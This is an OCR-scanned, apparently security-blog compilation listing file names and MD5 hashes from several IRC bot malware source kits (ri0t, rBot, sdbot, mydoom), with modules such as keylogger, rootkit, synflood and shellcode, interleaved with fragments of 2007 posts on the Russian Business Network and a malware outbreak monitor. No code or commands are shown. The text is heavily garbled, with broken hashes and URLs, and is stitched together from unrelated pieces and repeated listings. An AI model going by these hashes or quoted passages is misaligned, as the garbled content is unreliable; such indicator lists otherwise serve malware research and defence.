5d0f2e7154fd22a548f83a7129722062 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.h 
909fd90271f84f32a2055ab9b0d0ab16 
connect.h 
0099f8f502f2b1b97ee1853dd90d3c6a 
crc32.h 
1a8e23e4a21ec424d7al4cb327b5c290 
crypt.h 
bcff5ddf7b367a7f2da8137eb8d10614 
d3des.c 
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71e83b68e095b59f2d50deee79d73be7 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
136bc972b21a9002d6353ebe5c3caa4b 
download.h 
47df8bad1lde6fc3cf52ecaf03686d460 
driveinfo.h 
db9ec52dc459830c2282a7dealac5443 
ehandler.h 
5b8843010a35dc8539da3cb7b45c8ae2 
externs.h 
aff70ec943a899886d3f647ce0c053b6 
findfile.h 
874184ff14c51e874c744d79e133408d 
firefox.h 
cec26e3dcaf682619cf6a35fd0c5651f 
fphost.h 7055501d34bd3d43850df8b62e6831e1 
ftptransfer.h 
2d7d73c876ec17d3d69a276c635400b6 
functions.h 
bda208a7b1cc247a000a356abdef36a8 
global.h 3755356ffe76d8e33b47c447c6a1l8949 
globals.h 
9852184c3a4f34be8f389776d02a19b8 
httpd.h 
599d54bf6ca9d378f757c0494F729f3d 
icmpflood.h 
7cal6dd2046d8cc7c47c29acb196a5c7 
ident.h 
ae6dfe404ea9350e0a38e8feef721a68 
includes.h 
558272a6be293972c373260a70626186 
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IPHIpApi.h 
d3f68e5b027ecc755ce365baael1831b7 
irc _send.h 
d12c03479f2601d8e9f4d4331424b0d6 
keylogger.h 
8698c07ba01fa4ef7e8f8e865c785961 
LM.h 

2093587 efdf76c2c0b69406db5383a00 
LMat.h 
5a5b035baed125ad14c6e2851d68c66d 
loaddlls.h 
14502206ad010cOcabb2c754f6a69043 
Isarestrict.h 
85da7a61464785c33c70e31b84c3a45a 
misc.h 
db3d2c2cfl3bae418a0bd54fdcbdcb/7f 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h 0c85f5c813fald608dca7579fda3b692 
peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
processes.h 
b6532beb1cdd78e025d19e9ddf0101d7 
protocol.h 
41¢723f4213c258e879b24aa6d173688 
psniff.h b46ffe99c732d783da321f072984f62b 
remotecmd.h 
371fb06d45888807591157d53a7de366 
ri0t.h 
cb492b7df9b5c170d7c87527940eff3b 
rndnick.h 
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947443866b24c5eel1 leadfd6d19f0c08 
rootkit.h 
dal3deac13fdfdea619f405cd6b90ed9 
sandbust.h 
fc8a4024ac10b1cd82ac19405c265290 
secure.h cfdde4789e12b3b065c4879aab66a8066 
session.h 
bca52b5b5fc54e3ddab72b9d81lefe718 
shellcode.h 
a78c18fc522b485e5ed940f019b8b28a 
slimftp.h 
57980cf61ca33889db81ee866e85 7247 
startup.h 
415280488230dd24fecc8ca9eaee4 439 
sysinfo.h 
71b6f4ca6b16c7cbef493f9e9e1a00b0 
tcpip.h 
c0a4a74cb1c7e286fea06f17797fc13d 
tftpd.h 
874bfd4fe931flbbb6838f6e6felecee 
threads.h 
6669b077a8ed0bc2be5196cb054f5F28 
usb.h 
2d1faf4e4bdd1a2cal108a5e20022472a 
utility.cpp 

utility.h 
4f92f365982381c988d9863491e557f8 
visit. 
36758dad91c6a57fca4e850290690985 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
wildcard.h 
855113d59911c667289ff559fc8da328 
windns.h ec55fb42c3a5e553dbbe1bf3294a110f 
MSNMessengerAPI.tlb 
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e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tih 
9a2d4d4cc6cf9419c99a95cd7f6ef750 
MSNMessengerAPI.tli 
f14318f48edff06d3588d3d35f2a65bb 
msnsend.cpp 
893d3173da9ea898910c0a0d3d07210b 
msnsend.h 
bfb5a11a3d43ce4a99985fbd0859e317 
zip.cpp 
67637ea0d8f01b31lab83f80f0eel2f8a 
zip.h 
45efde25c907cc61lafcOcfa224629b4 
Build.cmd.bat 
d12c2eceee7b03fbb044bb369a83c9e5 
configs.h 
6d60a541daaf8cf92a3371a6c99e42f9 
ridt.dsp ba8221554b7bffcc68e701b76d6406ba 
ri0t.dsw 625010be028866bb8d0b2a148847460c 
aliaslog.cpp 
clbb09659eaddf661b7fdc4bf68530a5 
autostart.cpp 
25b3f8f00c217d72431002fd3f6d5691 
avirus.cpp 
2984d57c4faecb4918e292a1df902279 
cdkeys.cpp 
5059845fcfea9356469d8f2ad3e5bd77 
commands.cpp 
19bf2c786c402a951ecdf41bbce61924 
connect.cpp 
76c877a99b223bcd2d7fcba7844aa298 
crc32.cpp 
1d4e89b59d89256753d0fae5bbdb42e0 
crypt.cpp 
9ca9bf017d5c1769b0e63d8341fe324b 
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dcc.cpp 
ed0846a095b88fc9bab2efe3a542bdd5 
ddos.cpp d2c2bf439240c2ac09c69b22277ab63b 
download.cpp 
f226a9edaff257flae9e2a094e2bb878 
driveinfo.cpp 
9c243475be978d26856cc6635f86bb79 
ehandler.cpp 
9f9d7da3463d8f5691b9348cc3c06cla 
findfile.cpp 
b63d4a4e927fe5dcd6157ce32db8be94 
findpass.cpp 
031le3c4ee8faa7b83cdfd70a29204f53 
fphost.cpp 
df67a07f89c3f11342e3350c60ee0ba0 
ftptransfer.cpp 
b31b4ac2c575e32dee5ff22480ce5caa 
httpd.cpp 
8f71342e40a32318e562df4a8834d5f8 
icmpflood.cpp 
2cc1e263573ba9705ec22e8f282b640d 
ident.cpp 
1d066366b42c0d8950e4a25315620a45 
irc send.cpp 
074f976a815abee9b2310dc3679eb0b6 
keylogger.cpp 
6334bfb84f6e0da01b4c9480a6445198 
loaddlls.cpp 
7458b549ee810ea8b42aefd58a244a8e 
Isarestrict.cpp 
c4023717ee4270871e00c98bc357437d 
misc.cpp bO46f9bc2b53c7feaa58bb8eal1082947 
net.cpp 
dfee8405dd08db4e766d5200355ec960 
netutils.cpp 
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99c3clbed1c440468d10eb92d2f51b51 
peer2peer.cpp 
7f2c09d554e53cc401e9dd8da637d77c 
pingudp.cpp 
48648cf75ca3a629a651f9ca65a084e8 
processes.cpp 
2aa4d98c44d1dfflbf7fl3fab7b94fal 
protocol.cpp 
b8dee9a56cf73fe9ea7eec67785bfcdd 
psniff.cpp 
fdb5e9e82be7483c17560d60510ed96f 
pstore.cpp 
693f9defla4edfbdaeacedc33c46adf3 
remotecmd.cpp 
126033e64c4072387887757827920244 
ridt.cop c5eb2375026b71fc7a8d5eb48bd30f04 
rndnick.cpp 
70c7cd17f80187a67e925101962773f8 
session.cpp 
fcdf3e1cldd61a1cd9d443e05f92cd72 
shellcode.cpp 
640657f30fec7950060f13674b3fa171 
startup.cpp 
7818e284a4562fa2055afb109ea93e22 
synflood.cpp 
9ed25d43c6d62d0dbb9ab489c5c7féefb 
sysinfo.cpp 
60c55082c1925eec02006d679441d84b 
tcpflood.cpp 
0dbb971831995d48310bf32a881cb26b 
threads.cpp 
e90cfb732e485a55a5c2b0c22d21160a 
visit.cpp 
8131f39ac0O1d5aea64da85f4861c203c 


wildcard.cpp 
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"Jamz Yaneza, a Trend Micro research project manager, agreed. "We’re seeing signs of 
RBN-like activity elsewhere, in Turkey, Taiwan and China. RBN may be moving to places even 
more inaccessible to the law [than Russia]. Everyone knows they were in St. Petersburg, but 
now they’re changing houses, changing addresses. The Spamhaus Project antispam group 
has posted information that indicates RBN may have already laid claim to IP blocks located in 
China, Shanghai in particular." 


It’s always a pleasure to monitor the RBN, a single activity on behalf of their customers 
represents an entire sample to draw conclusions out of. Catch up with such activities like over 
[6]100 Malwares Hosted on a Single RBN IP, [7]Fake Anti Virus and Anti Spyware Software, 
and the most recent [8]Fake Suspended Account Messages while the IPs are alive and serving 
exploits and malware. Well, used to. 


UPDATE: [9]RBN - Russian Business Network, Chinese Web Space and Misdirection 


ttp://fergdawg. blogspot .com/ 


ttp://blog.trendmicro.com/rbn-goes- poof / 


ttp://blog.washingtonpost.com/securityfix/2007/11/russian_business_network_down.htm 


ttp://en.wikipedia.org/wiki/Russian_Business_Network 


ttp://www.computerworld.com/action/article.do?command=viewArticleBasickarticleId=9045929 


. http: //ddanchev. blogspot .com/2007/10/over-100-malwares-hosted-on-single-rbn.htm 
. http://ddanchev. blogspot .com/2007/10/russian-business-network.htm 


ttp://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.htm 


CONAN ARWNE 


ttp://rbnexploit .blogspot.com/2007/11/rbn-russian-business-network-its-use-of .htm 
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6ble7c52ebccc540d3fc51clafdcO08f5 
Changes.txt 
76e19fd8abb571b35bab13ee5311a008 
readme.cmd 
91987f07389b35ecd69c28bae88600a3 
YES README.BAT _IS_A_README!.txt 
aliaslog.h 
5d0f2e7154fd22a548f83a7129722062 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.h 
909fd90271f84f32a2055ab9b0d0ab16 
connect.h 
0099f8f502f2b1b97ee1853dd90d3c6a 
crc32.h 
1a8e23e4a21ec424d7al4cb327b5c290 
crypt.h 
bcff5ddf7b367a7f2da8137eb8d10614 
d3des.c 
71e83b68e095b59f2d50deee79d73be7 
dcc.h 
75cacbdd9ed4aad90df24c8b155fabdc 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
8a74d420b120036bb118f2073a983b6b 
download.h 
47df8bad1lde6fc3cf52ecaf03686d460 
driveinfo.h 
db9ec52dc459830c2282a7dealac5443 
ehandler.h 
5b8843010a35dc8539da3cb7b45c8ae2 


externs.h 
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6e33758044906b82fdf373056d335e82 
findfile.h 
874184ff14c51e874c744d79e133408d 
findpass.h 
6047eb07340790e79dal10514ee3e96c6 
fphost.h 7055501d34bd3d43850df8b62e6831e1 
ftptransfer.h 
2d7d73c876ec17d3d69a276c635400b6 
functions.h 
15c153dc4a4b20b6ae5bcd17c7e5f701 
global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
db667b4aed404f5947c733c03b6e166b 
httpd.h 
599d54bf6ca9d378f757c0494f729f3d 
icmpflood.h 
7cal6dd2046d8cc7c47c29acb196a5c7 
ident.h 
ae6dfe404ea9350e0a38e8feef721a68 
includes.h 
3a3453a73c2d2f5ddc4lalf4e5cc3e7d 
IPHIpApi.h 
d3f68e5b027ecc755ce365baael1831b7 
irc _send.h 
d12c03479f2601d8e9f4d4331424b0d6 
keylogger.h 
c277df95bccbd320aabe873a8efe7f5b 
LM.h 

2093587 efdf76c2c0b69406db5383a00 
LMat.h 
5a5b035baed125ad14c6e2851d68c66d 
loaddlls.h 
106328cb2ea88a9d0f7a3de60553d3b2 
Isarestrict.h 
85da7a61464785c33c70e31b84c3a45a 
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misc.h 
fc99e5cbd8ec5dcde12620cc0bd68474 
net.h 
5347d6alfla218fde8c111ffdce82b2e 
netutils.h 
3720fb521c144f81128d1d26abdb53a2 
nicklist.h 
dfc33d48fle4b4606ccO3cff5de6a9e9 


passwd.h 0c85f5c813fald608dca7579fda3b692 


peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.h 
903ab47a75d2ba1d5b09070e927e85e0 
processes.h 
3261a169e00e037835dd60ec35706ac1 
protocol.h 
492122eed322aecc4d6caa7f055b0eef 


psniff.h d9b8cf32bc275b063cd8d6afc351bb25 


remotecmd.h 
f28a40fe7a1b0c109367484a6deae203 
ri0t.h 
a6a96e4b50elaabc2ff9c59d1450e58F 
rndnick.h 
fb8538e7338eb50f01fe67b95cb1c67f 
session.h 
bca52b5b5fc54e3ddab72b9d81lefe718 
shellcode.h 
a78c18fc522b485e5ed940f019b8b28a 
startup.h 
415280488230dd24fecc8ca9eaee4439 
synflood.h 
6ede99645ff7c6e7ef6a448083407544 
sysinfo.h 
71b6f4ca6b16c7cbef493f9e9e1a00b0 
tcpflood.h 
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335f964504c055a95e9b2dda1249d220 
tcpip.h 
c0a4a74cb1c7e286fea06f17797fc13d 
threads.h 
ac7aceec18cb843d8e8da5beb7886cal 
visit.h 
36758dad91c6a57fca4e850290690985 
wildcard.h 
855113d59911c667289ff559fc8da328 
windns.h ec55fb42c3a5e553dbbel1bf3294a110f 
msn.cpp 
4becf7ed0675a14787a5ea30e55ff7f9 
msn.h 
2f682be8f4e32dal18ea73f5471020bed 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
zip.cpp 
67637ea0d8f01b31lab83f80f0eel2f8a 
zip.h 
45efde25c907cc61lafcOcfa224629b4 
build.cmd 
eb81804c8c4403f147be1a66b39268F4 
configs.h 
a2938dfec4001b8691d6e6a8e8a80b31 
jpg.ico 
0737b7da77e94cac76dc7f45ec55c33f 
README!!!.txt 
cfe278defdf4009d218a960610a811d1 
res.rc 
90e49b91cc71266477ffa2292481cfac 
ridt.dsp 90a45b800eb0caca04916f339534f5f7 
ri0t.dsw 4dc49d4212e7aa4a6c64ad0471ec9e95 
advscan.cpp 
cfd7c9c47279fcddbaee474a6ac4eb1b 
aliaslog.cpp 
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cl1bb09659eaddf661b7fdc4bf68530a5 
autostart.cpp 
25b3f8f00c217d72431002fd3f6d5691 
avirus.cpp 
2ef71c653599f1166ec460a74ab6a35a 
cdkeys.cpp 
8a8a80efa80ae8b8605fff558a3683bb 
commands.cpp 
fe64cf50bfbf27f41ac407e7c883fce6 
connect.cpp 
76¢877a99b223bcd2d7fcba7844aa298 
crc32.cpp 
1d4e89b59d89256753d0fae5bbdb42e0 
crypt.cpp 
cfb3b3f77f537096900ef19c566ec4e3 
dcom2.cpp 
6cf76bcac59f22965d641aa4eca357bd 
download.cpp 
f226a9edaff257flae9e2a094e2bb878 
driveinfo.cpp 
9c243475be978d26856cc6635f86bb79 
ehandler.cpp 
9f9d7da3463d8f5691b9348cc3c06cla 
findfile.cpp 
b63d4a4e927fe5dcd6157ce32db8be94 
firefox.cpp 
a68e8448502bd334cb4177f0becb9155 
fphost.cpp 
ef54a7e3eff16ce38d35a2c41028547f 
ftptransfer.cpp 
b31b4ac2c575e32dee5ff22480ce5caa 
httpd.cpp 
8f71342e40a32318e562df4a8834d5f8 
icmpflood.cpp 
2cc1e263573ba9705ec22e8f282b640d 
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ident.cpp 
1d066366b42c0d8950e4a25315620a45 
inject.cpp 

irc send.cpp 
074f976a815abee9b2310dc3679eb0b6 
keylogger.cpp 
6165c6e0f5bb44f31b81e86985fd9056 
loaddlls.cpp 
3d36db1f081526ab6b34a399ee70098c 
Isarestrict.cpp 
c4023717ee4270871e00c98bc357437d 
misc.cpp f5a7cObf77a529c56a87407457368b20 
net.cpp 
dfee8405dd08db4e766d5200355ec960 
netutils.cpp 
99c3cl1bed1c440468d10eb92d2f51b51 
peer2peer.cpp 
7f2c09d554e53cc401e9dd8da637d77c 
persist.cpp 
5890c92b5701bac5173628e6734db242 
pingudp.cpp 
48648cf75ca3a629a651f9ca65a084e8 
processes.cpp 
2aa4d98c44d1dfflbf7fl3fab7b94fal 
protocol.cpp 
dd5f893cd41f13ae525c84ae21d91708 
psniff.cpp 
81490420e961ed7f5ee2ce606b097d19 
pstore.cpp 
693f9defla4edfbdaeacedc33c46adf3 
remotecmd.cpp 
126033e64c4072387887757827920244 
ri0t.cpp 805747644bb30404a80437047b0e93ce 
rndnick.cpp 
70c7cd17f80187a67e925101962773f8 
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rootkit.cpp 
c2d20b4d8d23e30435f58fa215841c23 
sandbust.cpp 
b4e7da4814087371a5cae7f5839b9c8b 
secure.cpp 
1b41ff18d4ae0ef0984e9f079e248ce5 
session.cpp 
fcdf3elcldd61a1cd9d443e05f92cd72 
shellcode.cpp 
640657f30fec7950060f13674b3fa171 
slimftp.cpp 
ac2913599b52a37c990e1ff69f6e5eb6 
startup.cpp 
a4ff4cfaebdac4324ab7fd79afcb3ca4 
sysinfo.cpp 
60c55082c1925eec02006d679441d84b 
tftpd.cpp 
60952c3eb6ce97661e0c524f31ddcc5c 
threads.cpp 
e90cfb732e485a55a5c2b0c22d21160a 
usb.cpp 
f59be64e7c5eb59d44b40c65129f536a 
visit.cpp 
8131f39ac01d5aea64da85f4861c203c 
vnc.cpp 
468df7caab5eac644fd767a615c72dfc 
wildcard.cpp 
6ble7c52ebccc540d3fc51clafdc08f5 
commands.txt 
€241423e363897558214e8f9ba788bc9 
features.txt 
6celda23906a2ddfc214bf4fcb16158e 
Instructions.txt 
be254b9d220a40fe275d4427e485ac03 
BIN2C.COM 
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1399d96e3caeaf2ecfec61e50203c585 
bot2dll.dsp 
d14bcd3eca51b45afa91d2d4aa76b7d1 
bot2dll.dsw 
3b90db1ef40755a40ca7b63b2fb8a075 
build.cmd 
6785ad24b57453564fb27b471e47da89 
dil.cpp 
7288e8e2c14fdcaa4d90b01cd8dbf760 
ext.h 
f04f77d306b9996ea3e5f56e1b642bd3 
main.cpp 46038a39e159calal9ed6aa62d7c6c9e 
advscan.h 
b039c49c0063dac8fdc56a3a323bc05f 
aliaslog.h 
5d0f2e7154fd22a548f83a7129722062 
autostart.h 
5095d41452b5b046066ed3fcd68825a8 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
commands.h 
909fd90271f84f32a2055ab9b0d0ab16 
connect.h 
0099f8f502f2b1b97ee1853dd90d3c6a 
crc32.h 
1a8e23e4a21ec424d7a14cb327b5c290 
crypt.h 
bcff5ddf7b367a7f2da8137eb8d10614 
d3des.c 
71e83b68e095b59f2d50deee79d73be7 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.h 
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b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
136bc972b21a9002d6353ebe5c3caa4b 
download.h 
47df8bad1lde6fc3cf52ecaf03686d460 
driveinfo.h 
db9ec52dc459830c2282a7dealac5443 
ehandler.h 
5b8843010a35dc8539da3cb7b45c8ae2 
externs.h 
aff70ec943a899886d3f647ce0c053b6 
findfile.h 
874184ff14c51e874c744d79e133408d 
firefox.h 
cec26e3dcaf682619cf6a35fd0c5651f 


fphost.h 7055501d34bd3d43850df8b62e6831e1 


ftptransfer.h 
2d7d73c876ec17d3d69a276c635400b6 
functions.h 
bda208a7b1cc247a000a356abdef36a8 


global.h 3755356ffe76d8e33b47c447c6a18949 


globals.h 
9852184c3a4f34be8f389776d02a19b8 
httpd.h 
599d54bf6ca9d378f757c0494F729f3d 
icmpflood.h 
7cal6dd2046d8cc7c47c29acb196a5c7 
ident.h 
ae6dfe404ea9350e0a38e8feef721a68 
includes.h 
558272a6be293972c373260a70626186 
IPHIpApi.h 
d3f68e5b027ecc755ce365baael1831b7 
irc send.h 
d12c03479f2601d8e9f4d4331424b0d6 
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keylogger.h 
8698c07ba01fa4ef7e8f8e865c785961 
LM.h 
2093587efdf76c2c0b69406db5383a00 
LMat.h 
5a5b035baed125ad14c6e2851d68c66d 
loaddlls.h 
14502206ad010cOcabb2c754f6a69043 
Isarestrict.h 
85da7a61464785c33c70e31b84c3a45a 
misc.h 
db3d2c2cfl3bae418a0bd54fdcbdcb/7f 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h 0c85f5c813fald608dca7579fda3b692 
peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
processes.h 
b6532beb1cdd78e025d19e9ddf0101d7 
protocol.h 
41¢723f4213c258e879b24aa6d173688 
psniff.h b46ffe99c732d783da321f072984f62b 
remotecmd.h 
371fb06d45888807591157d53a7de366 
ri0t.h 
cb492b7df9b5c170d7c87527940eff3b 
rndnick.h 
947443866b24c5eelleadfd6d19f0c08 
rootkit.h 
dal3deac13fdfdea619f405cd6b90ed9 
sandbust.h 
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3.11.10 Yet Another Malware Outbreak Monitor (2007-11-09 15:28) 


com///touch® 


Search CO] | + 


Real Security. In Real Time. 


Partners News & Everts nhsciialagy E Ravaaree hn" 


Real-Time Outbreak Monitor 


Real-time Outbreak Monitor 


Point to oulbreak for more inititthatiogd 


Related Links 
Acti Spam SDK 


Zero Hour Virus Onuthenss 
Protecton SDK 


Reputation Service SDK 


Such [l]early warning security events systems always come as handy research tools for secu- 
rity analysts and reporters, and it’s great to see that more and more vendors are continuing 
to share [2]interactive threats data in real-time, type of data that used to be proprietary one 
several years ago. Commtouch’s recently announced [3]Malware Outbreak Center is another 
step in the right direction of intelligence data sharing, and building more transparency on 
emerging spam and malware outbreaks : 


"The Commtouch Malware Outbreak Center displays a sample of email-borne malware 
that has recently been detected and blocked by Commtouch’s Zero-Hour(TM) Virus Outbreak 
Protection solution. It also incorporates data from AV-Test.org, an independent third-party 
organization that tests most of the commercially available anti-virus scanners. This data 
enables the Center to publish comparative detection times for leading AV vendors, a first in 
this comprehensive format which includes malware variant checksum. Detection times are 
critical, since individual virus variants often peak and then nearly disappear, all in under three 
hours. IT managers now have access to an online tool that allows them to verify their AV 
vendor’s performance for each new outbreak, and to download comparative data per malware 
variant." 


Zero day DIY malware, and open source one undermine the reactive response time’s 
model, but without anti virus signatures in 2007 your company and customers would still 
be getting infected by outdated Netsky samples - it’s a fact, yet not the panacea of dealing 
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fc8a4024ac10b1cd82ac19405c265290 
secure.h cfdde4789e12b3b065c4879aa66a8066 
session.h 
bca52b5b5fc54e3ddab72b9d81lefe718 
shellcode.h 
a78c18fc522b485e5ed940f019b8b28a 
slimftp.h 
57980cf61ca33889db81ee866e85 7247 
startup.h 
415280488230dd24fecc8ca9eaee4439 
sysinfo.h 
71b6f4ca6b16c7cbef493f9e9e1a00b0 
tcpip.h 
c0a4a74cb1c7e286fea06f17797fc13d 
tftpd.h 
874bfd4fe931flbbb6838f6e6felecee 
threads.h 
6669b077a8ed0bc2be5196cb054f5F28 
usb.h 
2d1faf4e4bdd1a2cal108a5e20022472a 
utility.cpp 

utility.h 
4f92f365982381c988d9863491e557f8 
visit. 
36758dad91c6a57fca4e850290690985 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
wildcard.h 
855113d59911c667289ff559fc8da328 
windns.h ec55fb42c3a5e553dbbe1bf3294a110f 
MSNMessengerAPI.tlb 
e7802e3e938bff54cb2731cd3dc5a69c 
MSNMessengerAPI.tlh 
9a2d4d4cc6cf9419c99a95cd7fbef750 
MSNMessengerAPI.tli 
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f14318f48edff06d3588d3d35f2a65bb 
msnsend.cpp 
7fa851883fd38f017ff8868bcfla55fc 

msnsend.h 
bfb5a11a3d43ce4a99985fbd0859e317 

zip.cpp 

67637ea0d8f01lb31lab83f80f0eel2f8a 

zip.h 

45efde25c907cc61lafcOcfa224629b4 

crc32.c 

c2e731d846a546c707ffob7e35a8df40 

crc32.h 

372bf1d98a03d788ca4f072b27825703 
mydoom.opt 
340aaf552949524b332150bc0946b89e 
mydoom.plg 
9c1340f526aa3a52739d26125c97c65a 
ntpass.cpp 
307256b7c26fab7e0d95f7877b7965a2 
rBot.cpp 76702d5974af916bda5b2096c7e06551 
rBot.dsp eac049d33bdcd2ee9e6480c667ed58f9 
rBot.dsw 297b47293fd3464a579d3921ff164312 
rBot.ncb 5f803c5fa9cecdbe199c28f5362be69f 
rBot.opt a02a71cb5f4b80d19012c99f725cb990 
rBot.plg a22200b579dccf27af6lbabc62cc264e 
Synflood.cpp 
6286886a27f66521f82ac55b044060ce 

tcpip.h 

f2d929e1278ad3f507a5d6dc59fb98e8 

crc32.c 

c2e731d846a546c707ffob7e35a8df40 

crc32.h 

372bf1d98a03d788ca4f072b27825703 
mydoom.opt 
340aaf552949524b332150bc0946b89e 
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mydoom.plg 
9c1340f526aa3a52739d26125c97c65a 
ntpass.cpp 
d3f508f46f3ad8fa03f4a103851ec893 

rBot.cpp 909dfb4325642da98al1f7be9792d4973 
rBot.dsp eac049d33bdcd2ee9e6480c667ed58f9 
rBot.dsw 297b47293fd3464a579d3921ff164312 
rBot.ncb f6da67d29f89a6cc0f45666e7de3308d 
rBot.opt 74ea9494a9cd2726667a12871e6a45fb 
rBot.plg 684c50d64af9d5b7d34d6dc04a862d76 
Synflood.cpp 
6286886a27f66521f82ac55b044060ce 

tcpip.h 

f2d929e1278ad3f507a5d6dc59fb98e8 
advscan.cpp 
fc3263145749deac7e2b6064519ba558 
advscan.h 
2589adb7d502f93c0d7d6724c7d81039 
aliaslog.cpp 
d60195a5148165141d045628f82671el1 
aliaslog.h 
5ab9c4b1902efad266b94b7930fb3ec7 
autostart.cpp 
09e282ede5d3f5cb74fdc11f42a4aaaa 
autostart.h 
f4fbe0c8b65385e430a777691ff7aace 
avirus.cpp 
90230d9aef62be4cef439832c0fe54ce 

avirus.h e55a156d28fde56a0bb05fc599dafecf 
config.h 7ad4ceb4cc9a89d484b277aed2196a41 
dcom.cpp 64fa33eaa2a9de04bcfl1dd59f20e852 
dcom.h 

b2792e423f3ec732793723d53a0e12c8 
Defines.h 
6ae1532b45d10ce20e821fd69497b65c 
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dns.cpp 
9024084fc54bb1cc479f256427332269 
dns.h 
ab2c466be14b5bdc7926d3e51ae2d10f 
download.cpp 
ac15371ba98b7e270dca3f9be3clbafd 
download.h 
187868409ecd324a855187414b397167 
driveinfo.cpp 
61489a2a37e1c3cdb6990d6b2f5916b4 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
extern.h 70f27e8c3747f5da79c608cae2a94429 
fphost.cpp 
cb92cla0cdada8afd7b92bdbb8650885 
fphost.h 72b69b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp dc08e7206529f1db44355837bf18d326 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
baef36d4baf239dfd7d04b8971e7c438 
hostauth.cpp 
b55c6c608ab00008ec2c003c00353f90 
hostauth.h 
a5c89d3564e47d616ab4e64920a68d96 
httpd.cpp 
a3e77470f9c5daeba521a95ca0743f3e 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
70fc604da1812fca684b701a4e500222 
icmpflood.h 
4462c6318220648820316848deb124fd 
identd.cpp 
flad766874468961407ae58418b1e900 
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identd.h d59ab0522f735c3d29ffd032870e522f 
Includes.h 
78a62cC721625b798a7cfe7dd45c7d8e4 
irc send.cpp 
76ec2b840db2701d00d0f75675555a8e 
irc send.h 
65e70187da5c1166002c32a86a808194 
loaddll.cpp 
e6b0cc2638b8dcec4b263bd3521bd253 
loaddll.h 
d91dbc62cbb743d0d5ceea7527db8450 
misc.cpp 01613e25c0223581028459f71800974a 
misc.h 
ea5b8eb52a7124b69d2ccfb4e1319df7 
ms04 007 asnl.cpp 
2a853c9d10336d329d45043a0ff4ccle 
ms04 _007 asnl.h 
9ba0297d16535978fa6341a6633b7e35 
net.cpp 
9c383b2d4e6517a85ce84d3c69ef4e39 
net.h 
Obcae316c7ad0e800dd1758880a25acf 
netapi.cpp 
0c6064856095ed180049c816c7d60063 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netheaders.h 
dce3ff7flb3f5e902e6a7485d174c287 
netutils.cpp 
7ce06dda762d5706fce5eea2e38c55bf 
netutils.h 
82656db154a96c47d74069f4bccd24e5 
passwd.h 76459e9d8a479f2ef8ca2al1a6737f580 
processes.cpp 
b66c0665216dc2288bcf8fff01786931 
processes.h 
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f7c75cccfaaef0c459ac6c020cf6808d 
rndnick.cpp 
fd6bd05f136b6c6192b08e09455942dc 
rndnick.h 
26e98f60f0f8b3392elea0b4ad0e247d 
scan.cpp bc960d7eb12a521c33b321173a7fbd3b 
scan.h 

sdbot05b.cpp 
a27d0fd77927d22951e273459599061c 
sdbot05b.dsp 
€3051b2536163fee923162ef32846d40 
sdbot05b.dsw 
11ac2f28922917d1f0ae90ea17f13241 
sdbot05b.h 
c81bdbc19e13c93fce3230bab69f6f83b 
sdbot05b.opt 
€43a237c6044e8287653c7b29bc53718 
secure.cpp 
821dc62739e2cee603fdeb342cea92ee 
secure.h 91d9c721labbf6c860b7f59b7580e8451 
shellcode.cpp 
007902c34ed313a34c47397e84fdc434 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
sniffer.cpp 
d65cf47372e789930ff139dd9b459635 
sniffer.h 
5eebe93de4e03bf0bb118e35997743a9 
socks.cpp 
adcb2d40f1bd49d73e6b15b6ce4c69dd 
socks.h 
b103f307ff02cd98fe2bfbecbd19c011 
synflood.cpp 
142e1970540de2d63ac5dda8188208ae 
synflood.h 
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78df095c5aa59a0bfaa783e6edd38d0d 
taskhider.cpp 
177cd3592dbc89c7676d4e7b7a5921F4 
taskhider.h 
389c143483d51daec2eb37fdb78744al 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
f1980d02582ebdffcd77fld4ee3522fd 
tftpd.h 
b187f7ba95f4d498138c6d42607c6929 
threads.cpp 
3e4e79fce663cf7a6e67f8f3de90acla 
threads.h 
71d97ecb2fb1129abe3ffd979193dlaf 
visit.cpp 
9eb5e0e50f7a87c7d8d1c85cc32adc4e 
visit. 
5ffab31leb3db2a5c000bd789b4f46025 
vnc.cpp 
73a90cb08432538a4440cda8efb796ff 
vnc.h 
76734009998943bb064222c5c3b4c59e 
advscan.cpp 
0f186b618e0ee990bc195ac10908ebbe 
advscan.h 
2589adb7d502f93c0d7d6724c7d81039 
aliaslog.cpp 
d60195a5148165141d045628f82671e1 
aliaslog.h 
5ab9c4b1902efad266b94b7930fb3ec7 
autostart.cpp 
09e282ede5d3f5cb74fdc11f42a4aaaa 
